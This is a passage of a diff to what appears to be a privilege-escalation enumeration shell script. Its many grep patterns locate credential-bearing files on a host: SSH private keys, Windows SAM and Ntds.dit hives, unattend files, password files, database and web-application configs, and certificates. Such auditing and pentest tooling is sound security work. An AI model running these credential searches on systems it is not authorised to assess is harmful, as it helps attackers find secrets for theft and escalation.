"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) - PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) - PSTORAGE_DATABASE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) - PSTORAGE_BACKUPS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "backup$|backups$" | sort | uniq | head -n 70) - PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) + PSTORAGE_SYSTEMD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.service$" | sort | uniq | head -n 70) + PSTORAGE_TIMER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.timer$" | sort | uniq | head -n 70) + PSTORAGE_SOCKET=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.socket$" | sort | uniq | head -n 70) + PSTORAGE_DBUS=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) + PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mysql$" | sort | uniq | head -n 70) + PSTORAGE_MARIADB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) + PSTORAGE_POSTGRESQL=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) + PSTORAGE_APACHE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) + PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/var|^/private|^/mnt|^/tmp" | grep -E "sess_.*$" | sort | uniq | head -n 70) + PSTORAGE_PHP_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_WORDPRESS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) + PSTORAGE_DRUPAL=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/default/settings.php' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_MOODLE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E 'moodle/config.php' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "config\.php$" | sort | uniq | head -n 70) + PSTORAGE_TOMCAT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) + PSTORAGE_MONGO=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) + PSTORAGE_SUPERVISORD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CESI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) + PSTORAGE_RSYNC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) + PSTORAGE_HOSTAPD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_RACOON=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) + PSTORAGE_VNC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) + PSTORAGE_LDAP=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ldap$" | sort | uniq | head -n 70) + PSTORAGE_OPENVPN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) + PSTORAGE_SSH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) + PSTORAGE_CERTSB4=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) + PSTORAGE_CERTSBIN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) + PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) + PSTORAGE_SSH_AGENTS=$(echo -e 